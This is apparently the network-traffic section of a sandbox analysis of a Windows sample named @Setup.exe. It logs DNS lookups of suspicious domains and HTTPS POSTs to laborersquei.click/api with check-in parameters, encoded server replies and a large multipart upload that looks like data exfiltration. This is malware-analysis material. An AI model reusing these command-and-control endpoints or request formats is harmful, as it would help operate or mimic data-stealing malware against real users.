                                                                                                                                                                                            Dec 27, 2024 20:24:02.221560955 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.221611023 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.229348898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.229367018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.229429007 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.229445934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.229479074 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.229521036 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.236247063 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.236263037 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.236332893 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.236349106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.236407995 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.243973017 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.243990898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.244045973 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.244077921 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.244113922 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.244137049 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.245769978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.245827913 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.245842934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.245881081 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.245908022 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.245934010 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.302011013 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.405770063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.405842066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.405877113 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.405896902 CET44349747172.67.208.58192.168.2.4

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Dec 27, 2024 20:23:16.197778940 CET5329653192.168.2.41.1.1.1
                                                                                                                                                                                            Dec 27, 2024 20:23:16.623289108 CET53532961.1.1.1192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:39.461886883 CET5549153192.168.2.41.1.1.1
                                                                                                                                                                                            Dec 27, 2024 20:23:39.600058079 CET53554911.1.1.1192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.788049936 CET5065953192.168.2.41.1.1.1
                                                                                                                                                                                            Dec 27, 2024 20:23:41.933196068 CET53506591.1.1.1192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:42.777859926 CET5748353192.168.2.41.1.1.1
                                                                                                                                                                                            Dec 27, 2024 20:23:42.925252914 CET53574831.1.1.1192.168.2.4

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Dec 27, 2024 20:23:16.197778940 CET192.168.2.41.1.1.10x606eStandard query (0)laborersquei.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:39.461886883 CET192.168.2.41.1.1.10x3fafStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:41.788049936 CET192.168.2.41.1.1.10x5fe8Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:42.777859926 CET192.168.2.41.1.1.10x77ffStandard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Dec 27, 2024 20:23:16.623289108 CET1.1.1.1192.168.2.40x606eNo error (0)laborersquei.click172.67.166.49A (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:16.623289108 CET1.1.1.1192.168.2.40x606eNo error (0)laborersquei.click104.21.89.250A (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:39.600058079 CET1.1.1.1192.168.2.40x3fafNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:41.933196068 CET1.1.1.1192.168.2.40x5fe8No error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:41.933196068 CET1.1.1.1192.168.2.40x5fe8No error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                                                            Dec 27, 2024 20:23:42.925252914 CET1.1.1.1192.168.2.40x77ffName error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • laborersquei.click
                                                                                                                                                                                            • cegu.shop
                                                                                                                                                                                            • klipvumisui.shop

                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.449731172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:18 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                            2024-12-27 19:23:18 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:18 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=dl254nfvsaiqq2negoi5npenee; expires=Tue, 22 Apr 2025 13:09:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPk25w1QYPGjG5vWIOUNP7ymfg0oisdHCCJZsfs%2B3Z1mE4iEkAfAxRF6gW6VTZhUAd2IGIDfZh5INHgB8%2Fb6QxRptQ9Ivc79E638VKV%2FBKMqmONCKLoio68s13qEAYShz3hOxIQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf2f4e290f5b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1476&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1766485&cwnd=221&unsent_bytes=0&cid=2f341c66ddb6f643&ts=746&x=0"
                                                                                                                                                                                            2024-12-27 19:23:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                            2024-12-27 19:23:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.449732172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:19 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 78
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:19 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:20 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=dfqr39qt1d3darp54f9k3ftk80; expires=Tue, 22 Apr 2025 13:09:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7kVXSb47YumShugCKjGGFPJYgL4LdPC2IPngo%2Byrmh30OX0YlqYRUnXPPuoLFtSZ9i2BtE1OOep6oElT%2B3H1CMFag%2BgwmfLp1HGn%2FK6nu1YoVG1pwPU1%2B8u%2FeTB9SD7YJCXzYg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf3b7c9b32ca-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1845&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=980&delivery_rate=1582655&cwnd=221&unsent_bytes=0&cid=a1c101a265494434&ts=778&x=0"
                                                                                                                                                                                            2024-12-27 19:23:20 UTC234INData Raw: 34 66 34 37 0d 0a 69 6c 69 33 67 6f 76 4b 73 57 6f 75 76 42 52 54 62 31 4e 7a 2f 47 55 4b 61 61 32 72 6a 66 6b 47 43 4b 78 51 6a 38 6a 58 58 6a 72 78 65 73 47 67 73 66 36 64 53 46 33 5a 4e 6d 6b 62 49 51 61 5a 53 53 67 49 79 59 6d 33 6e 32 64 6b 33 7a 57 6a 36 71 45 7a 47 4c 41 2b 31 75 37 34 72 35 31 49 53 38 51 32 61 54 51 6f 55 5a 6b 4c 4b 46 4f 50 7a 75 65 62 5a 32 54 4f 4d 65 53 6e 70 7a 4a 5a 34 6a 54 51 36 75 36 70 31 51 74 43 30 58 45 32 43 6a 49 5a 6b 67 78 6e 41 63 43 4a 6f 64 74 6a 63 6f 35 71 72 59 57 79 4b 6c 76 48 4f 63 54 70 71 62 65 64 45 51 7a 5a 65 6e 46 56 63 52 4b 5a 42 32 59 50 79 63 44 6c 6b 57 35 73 7a 7a 54 6c 75 4c 34 34 55 75 49 36 30 2b 76 6b 6f 4d 45 47 53 4e 5a 36
                                                                                                                                                                                            Data Ascii: 4f47ili3govKsWouvBRTb1Nz/GUKaa2rjfkGCKxQj8jXXjrxesGgsf6dSF3ZNmkbIQaZSSgIyYm3n2dk3zWj6qEzGLA+1u74r51IS8Q2aTQoUZkLKFOPzuebZ2TOMeSnpzJZ4jTQ6u6p1QtC0XE2CjIZkgxnAcCJodtjco5qrYWyKlvHOcTpqbedEQzZenFVcRKZB2YPycDlkW5szzTluL44UuI60+vkoMEGSNZ6
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 4d 41 41 79 55 64 42 48 62 78 4f 50 6b 61 2f 49 56 6d 6e 66 49 2f 69 6e 70 54 6f 59 39 33 54 4d 6f 4f 36 6b 6b 31 41 4d 31 6e 6f 2f 43 44 49 65 6d 51 5a 6f 47 63 44 4a 37 4a 4e 73 62 73 51 39 34 71 57 37 4e 6c 2f 67 4d 39 4c 76 37 71 44 56 42 30 2b 65 4f 48 45 4b 4b 56 48 47 52 30 67 62 7a 4d 72 37 6c 6e 55 71 30 58 7a 30 36 72 49 77 47 4c 42 36 30 2b 37 6f 70 64 4d 61 52 4e 56 39 4e 42 38 36 47 4a 4d 4b 61 41 62 46 78 75 79 62 59 32 44 45 50 65 65 75 75 44 46 65 36 44 71 56 72 71 6d 76 79 30 67 55 6e 6c 55 30 48 54 59 64 69 45 56 53 53 39 43 48 39 74 74 6a 5a 6f 35 71 72 61 4b 77 50 31 76 6a 4e 64 62 6f 34 72 72 54 47 6b 72 54 63 79 4d 4c 4e 42 2b 55 42 48 6f 42 77 63 2f 73 6b 6d 39 6a 79 7a 58 70 36 76 74 38 58 2f 42 36 6a 61 44 49 70 64 67 45 52 73 6c
                                                                                                                                                                                            Data Ascii: MAAyUdBHbxOPka/IVmnfI/inpToY93TMoO6kk1AM1no/CDIemQZoGcDJ7JNsbsQ94qW7Nl/gM9Lv7qDVB0+eOHEKKVHGR0gbzMr7lnUq0Xz06rIwGLB60+7opdMaRNV9NB86GJMKaAbFxuybY2DEPeeuuDFe6DqVrqmvy0gUnlU0HTYdiEVSS9CH9ttjZo5qraKwP1vjNdbo4rrTGkrTcyMLNB+UBHoBwc/skm9jyzXp6vt8X/B6jaDIpdgERsl
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 77 4f 65 43 33 6f 48 78 63 2f 67 6c 6d 67 71 67 48 4c 71 73 76 56 6b 47 4d 49 35 77 65 50 6a 36 75 59 4c 51 74 42 78 4a 30 30 75 58 34 64 48 62 77 65 50 6b 61 2b 57 5a 57 4c 49 49 4f 4b 6e 74 6a 4a 57 35 7a 2f 61 36 4f 6d 6f 33 67 31 49 31 58 30 79 41 44 55 44 6c 41 64 67 44 73 37 44 35 64 73 71 4b 73 6b 71 72 66 4c 31 44 55 2f 6a 65 4f 44 6a 35 36 62 55 48 67 7a 42 4f 43 68 4e 4e 68 33 65 58 79 67 47 78 38 7a 71 6c 47 56 67 77 44 66 6e 70 72 30 79 57 2f 6f 31 30 65 44 6c 6f 4e 6b 46 51 74 70 2b 4f 41 59 36 46 35 34 47 59 6b 75 42 69 65 69 44 4a 44 4b 4f 42 75 71 6d 75 44 4d 61 33 54 6e 62 37 75 36 2b 6b 78 63 43 78 7a 59 32 41 58 46 4a 33 67 74 68 43 38 54 44 36 35 74 6a 5a 38 73 78 36 71 6d 34 4f 31 4c 6d 50 64 48 73 34 4b 58 56 43 45 76 61 63 79 4d 49
                                                                                                                                                                                            Data Ascii: wOeC3oHxc/glmgqgHLqsvVkGMI5wePj6uYLQtBxJ00uX4dHbwePka+WZWLIIOKntjJW5z/a6Omo3g1I1X0yADUDlAdgDs7D5dsqKskqrfL1DU/jeODj56bUHgzBOChNNh3eXygGx8zqlGVgwDfnpr0yW/o10eDloNkFQtp+OAY6F54GYkuBieiDJDKOBuqmuDMa3Tnb7u6+kxcCxzY2AXFJ3gthC8TD65tjZ8sx6qm4O1LmPdHs4KXVCEvacyMI
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 78 64 42 64 6d 4a 38 4e 56 39 4b 73 6b 2b 72 66 4c 31 4e 56 48 36 4e 4e 76 70 35 4b 37 62 44 30 4c 54 66 54 63 47 4e 68 61 59 43 6d 41 47 79 73 72 75 6e 32 35 34 7a 54 6e 6e 70 37 39 38 46 71 67 39 7a 61 43 78 36 50 51 45 5a 63 35 74 49 78 74 78 44 74 41 65 4b 41 7a 44 69 62 66 62 5a 32 58 48 50 65 57 69 75 6a 4e 63 35 6a 7a 54 37 65 79 6e 32 52 70 45 30 48 73 36 41 6a 6f 44 6e 67 70 73 42 38 76 42 35 4a 45 6b 4a 49 34 31 39 65 72 74 66 47 33 6c 4e 64 58 6a 2f 2b 6a 4d 52 6c 57 65 63 54 31 4e 61 56 47 53 43 57 67 45 77 38 58 6b 6b 32 56 6d 77 44 58 6f 6f 37 30 30 53 75 6b 2b 33 65 48 6e 70 39 49 4d 53 64 74 79 4e 67 6b 33 48 74 35 4a 4b 41 7a 58 69 62 66 62 53 30 33 37 63 4d 79 51 39 53 4d 57 38 58 72 53 37 4b 6e 77 6b 77 52 50 30 6e 34 2b 43 7a 67 64 6c
                                                                                                                                                                                            Data Ascii: xdBdmJ8NV9Ksk+rfL1NVH6NNvp5K7bD0LTfTcGNhaYCmAGysrun254zTnnp798Fqg9zaCx6PQEZc5tIxtxDtAeKAzDibfbZ2XHPeWiujNc5jzT7eyn2RpE0Hs6AjoDngpsB8vB5JEkJI419ertfG3lNdXj/+jMRlWecT1NaVGSCWgEw8Xkk2VmwDXoo700Suk+3eHnp9IMSdtyNgk3Ht5JKAzXibfbS037cMyQ9SMW8XrS7KnwkwRP0n4+Czgdl
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 46 77 75 75 59 59 47 2f 42 4d 2b 79 73 70 7a 74 52 2b 6a 54 59 37 2b 47 67 32 67 6c 49 32 33 73 33 41 54 73 51 6d 51 6c 6d 41 34 2b 48 72 35 78 38 4b 70 5a 79 7a 4c 71 75 4c 6b 37 6c 47 39 6a 76 71 62 65 64 45 51 7a 5a 65 6e 46 56 63 52 69 4d 41 32 55 5a 78 73 37 68 6c 47 64 34 7a 7a 2f 6d 75 4c 49 7a 58 4f 38 32 30 2b 2f 76 71 64 59 43 51 4e 6c 7a 4f 67 49 39 55 64 42 48 62 78 4f 50 6b 61 2b 31 62 33 6e 5a 4d 65 4f 68 6f 79 63 59 39 33 54 4d 6f 4f 36 6b 6b 31 41 4d 33 58 30 36 43 54 45 64 6e 67 4e 6c 43 39 33 47 36 4a 78 74 59 64 77 34 36 71 32 2b 4e 46 50 6e 50 4d 66 73 35 37 72 57 47 6c 36 65 4f 48 45 4b 4b 56 48 47 52 31 34 4d 33 39 6e 73 32 56 56 38 7a 53 54 6d 70 37 6c 38 52 36 59 6a 6c 65 66 6c 36 49 74 49 53 74 46 2f 4d 67 49 77 47 4a 49 4b 62 51
                                                                                                                                                                                            Data Ascii: FwuuYYG/BM+yspztR+jTY7+Gg2glI23s3ATsQmQlmA4+Hr5x8KpZyzLquLk7lG9jvqbedEQzZenFVcRiMA2UZxs7hlGd4zz/muLIzXO820+/vqdYCQNlzOgI9UdBHbxOPka+1b3nZMeOhoycY93TMoO6kk1AM3X06CTEdngNlC93G6JxtYdw46q2+NFPnPMfs57rWGl6eOHEKKVHGR14M39ns2VV8zSTmp7l8R6Yjlefl6ItIStF/MgIwGJIKbQ
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 6f 32 39 6b 2f 44 48 32 36 71 70 79 51 61 67 39 32 61 43 78 36 4e 41 50 54 39 39 38 4f 41 45 2b 46 70 6f 56 59 67 7a 64 79 4f 36 51 61 57 62 4f 50 2b 43 67 74 44 56 56 35 44 66 53 35 2b 61 74 6b 30 59 4d 32 57 35 78 56 58 45 77 6b 77 78 6b 55 4a 57 4a 38 4e 56 39 4b 73 6b 2b 72 66 4c 31 50 46 4c 74 4d 4e 6a 6a 35 71 76 42 43 55 72 4d 64 6a 77 48 49 78 75 56 41 6d 55 47 77 73 72 70 6e 57 39 6d 33 44 76 74 71 62 35 38 46 71 67 39 7a 61 43 78 36 50 41 66 57 74 52 78 50 52 73 36 45 4a 30 52 5a 52 75 50 68 36 2b 4b 59 33 75 4f 61 76 75 36 6f 6a 74 48 70 69 4f 56 35 2b 58 6f 69 30 68 4b 31 33 41 32 43 7a 38 44 6d 77 46 6e 42 4d 62 41 36 35 4e 6e 61 73 6f 32 36 71 2b 32 4d 46 50 76 4f 64 72 6b 34 4b 62 61 42 77 79 51 4e 6a 59 56 63 55 6e 65 4a 6e 4d 49 77 38 53
                                                                                                                                                                                            Data Ascii: o29k/DH26qpyQag92aCx6NAPT998OAE+FpoVYgzdyO6QaWbOP+CgtDVV5DfS5+atk0YM2W5xVXEwkwxkUJWJ8NV9Ksk+rfL1PFLtMNjj5qvBCUrMdjwHIxuVAmUGwsrpnW9m3Dvtqb58Fqg9zaCx6PAfWtRxPRs6EJ0RZRuPh6+KY3uOavu6ojtHpiOV5+Xoi0hK13A2Cz8DmwFnBMbA65Nnaso26q+2MFPvOdrk4KbaBwyQNjYVcUneJnMIw8S
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 63 64 79 6f 2b 71 79 4a 42 69 77 65 76 58 72 2f 36 33 55 48 67 37 72 64 54 38 44 4e 67 66 65 47 46 64 46 6a 38 69 76 77 31 31 7a 6a 69 53 74 38 75 64 79 47 50 70 36 6a 61 43 75 71 38 45 61 53 74 31 67 4d 6b 6f 50 4c 37 6b 52 59 67 7a 66 7a 76 69 55 4a 43 53 4f 50 61 33 79 6a 48 78 52 37 79 48 45 39 75 53 34 31 45 68 7a 6b 44 59 70 54 57 6c 52 71 77 52 6d 42 63 6a 66 2f 74 5a 44 66 4d 51 31 2f 61 32 69 4d 78 69 6d 65 74 4f 67 73 66 75 64 53 45 6a 50 4e 6d 6c 64 59 30 72 4c 56 44 39 62 6e 64 61 68 67 69 52 38 6a 6d 71 2f 35 50 55 75 47 4c 42 36 6b 75 50 37 75 74 55 4c 57 74 30 78 44 7a 4d 57 43 35 4d 42 66 78 72 78 39 2b 69 42 61 57 7a 5a 49 36 47 2f 74 6a 4a 57 37 79 79 56 72 71 6d 6e 6b 31 42 31 6e 6a 35 78 4d 6e 39 52 68 6b 63 77 53 2f 72 4b 34 5a 56 6a
                                                                                                                                                                                            Data Ascii: cdyo+qyJBiwevXr/63UHg7rdT8DNgfeGFdFj8ivw11zjiSt8udyGPp6jaCuq8EaSt1gMkoPL7kRYgzfzviUJCSOPa3yjHxR7yHE9uS41EhzkDYpTWlRqwRmBcjf/tZDfMQ1/a2iMximetOgsfudSEjPNmldY0rLVD9bndahgiR8jmq/5PUuGLB6kuP7utULWt0xDzMWC5MBfxrx9+iBaWzZI6G/tjJW7yyVrqmnk1B1nj5xMn9RhkcwS/rK4ZVj
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 76 71 37 57 34 57 71 43 69 56 75 4b 6e 76 30 42 70 65 32 48 55 6e 44 6e 59 76 6f 43 42 6d 44 4d 37 66 2f 34 78 72 56 50 41 6e 37 71 53 37 4f 30 37 35 65 70 75 67 35 75 69 4c 4d 51 79 57 4e 67 35 44 63 51 6e 65 58 79 67 2b 7a 4d 66 68 6e 48 4a 37 67 78 58 6a 72 62 51 71 53 50 38 31 6c 61 36 70 72 70 4e 51 48 70 41 32 4e 52 78 78 53 63 35 56 4d 31 36 63 6e 72 2f 4a 65 79 54 58 63 76 76 71 37 57 34 57 71 43 69 56 75 4b 6e 76 30 42 70 65 32 48 55 6e 44 6e 59 76 6f 43 42 6d 44 4d 37 66 2f 34 78 72 4a 65 41 45 7a 4a 53 4c 4b 56 76 6d 4e 4e 4c 32 2b 4f 69 64 53 45 4f 65 4c 67 68 4e 65 56 47 68 53 53 67 54 6a 35 47 76 72 6d 64 6b 77 44 58 37 75 2f 67 62 56 75 38 37 77 2f 44 2b 70 35 77 6d 65 76 38 32 66 30 30 33 55 63 5a 56 4a 6b 76 4c 32 4b 2f 44 4e 44 69 56 5a
                                                                                                                                                                                            Data Ascii: vq7W4WqCiVuKnv0Bpe2HUnDnYvoCBmDM7f/4xrVPAn7qS7O075epug5uiLMQyWNg5DcQneXyg+zMfhnHJ7gxXjrbQqSP81la6prpNQHpA2NRxxSc5VM16cnr/JeyTXcvvq7W4WqCiVuKnv0Bpe2HUnDnYvoCBmDM7f/4xrJeAEzJSLKVvmNNL2+OidSEOeLghNeVGhSSgTj5GvrmdkwDX7u/gbVu87w/D+p5wmev82f003UcZVJkvL2K/DNDiVZ
                                                                                                                                                                                            2024-12-27 19:23:20 UTC1369INData Raw: 79 58 36 68 30 6c 66 69 70 38 4a 4d 6c 58 74 6c 6d 4d 6b 31 2f 55 5a 4a 48 4d 45 76 43 32 2b 69 4c 5a 79 62 4a 4b 4f 72 71 71 6e 4a 42 71 43 79 56 75 4c 72 6d 6b 78 6f 4d 68 6a 5a 32 41 7a 77 51 6e 51 6c 72 47 64 33 50 37 49 31 6e 4c 66 41 4d 77 4c 69 79 4c 46 75 71 43 39 6a 6b 2f 37 33 51 47 45 76 67 53 42 77 66 4e 67 47 64 52 55 51 4d 77 73 58 52 70 56 4e 37 79 53 4b 76 6a 4c 59 71 57 36 68 30 6c 66 69 70 38 4a 4d 6c 58 74 6c 6d 4d 6b 38 64 46 70 4d 4c 4b 42 53 42 30 4b 2b 4e 4a 44 4b 64 66 4b 32 34 39 57 51 59 72 7a 6e 48 38 75 2b 72 78 51 73 4c 34 45 67 63 48 7a 59 42 6e 55 56 5a 42 73 76 66 2b 70 68 30 62 66 41 4d 77 4c 69 79 4c 46 75 71 48 2b 2b 69 32 4c 37 51 43 45 4c 5a 4e 6e 39 4e 4b 56 48 47 52 30 55 5a 79 4e 6e 73 32 55 46 51 6a 41 50 37 71 62
                                                                                                                                                                                            Data Ascii: yX6h0lfip8JMlXtlmMk1/UZJHMEvC2+iLZybJKOrqqnJBqCyVuLrmkxoMhjZ2AzwQnQlrGd3P7I1nLfAMwLiyLFuqC9jk/73QGEvgSBwfNgGdRUQMwsXRpVN7ySKvjLYqW6h0lfip8JMlXtlmMk8dFpMLKBSB0K+NJDKdfK249WQYrznH8u+rxQsL4EgcHzYBnUVZBsvf+ph0bfAMwLiyLFuqH++i2L7QCELZNn9NKVHGR0UZyNns2UFQjAP7qb


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.449734172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:22 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=72RT6UG4D
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 18108
                                                                                                                                                                                            Host: laborersquei.click
